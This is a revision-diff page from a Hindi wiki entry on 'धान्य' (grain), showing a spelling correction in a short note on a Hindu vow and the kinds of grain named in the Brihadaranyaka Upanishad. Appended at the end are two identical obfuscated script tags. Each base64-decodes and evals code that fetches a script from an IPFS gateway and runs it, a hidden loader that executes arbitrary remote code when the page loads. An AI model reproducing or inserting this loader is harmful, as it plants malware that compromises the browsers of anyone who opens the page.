Difference between revisions of "धान्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*ग्राम्य अर्थात् किसी ग्राम में उत्पन्न किया हुआ।  
 
*ग्राम्य अर्थात् किसी ग्राम में उत्पन्न किया हुआ।  
 
*[[बृहदारण्यकोपनिषद]]<ref>बृहदारण्यकोपनिषद, (6|3|13)</ref> में धान्य के दस प्रकार तथा अन्य पश्चात्यकालीन ग्रन्थों में 17 या 18 प्रकार कहे गये हैं।  
 
*[[बृहदारण्यकोपनिषद]]<ref>बृहदारण्यकोपनिषद, (6|3|13)</ref> में धान्य के दस प्रकार तथा अन्य पश्चात्यकालीन ग्रन्थों में 17 या 18 प्रकार कहे गये हैं।  

Revision as of 17:09, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • gramy arthath kisi gram mean utpann kiya hua.
  • brihadaranyakopanishad[1] mean dhany ke das prakar tatha any pashchatyakalin granthoan mean 17 ya 18 prakar kahe gaye haian.

 

tika tippani aur sandarbh

  1. brihadaranyakopanishad, (6|3|13)

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>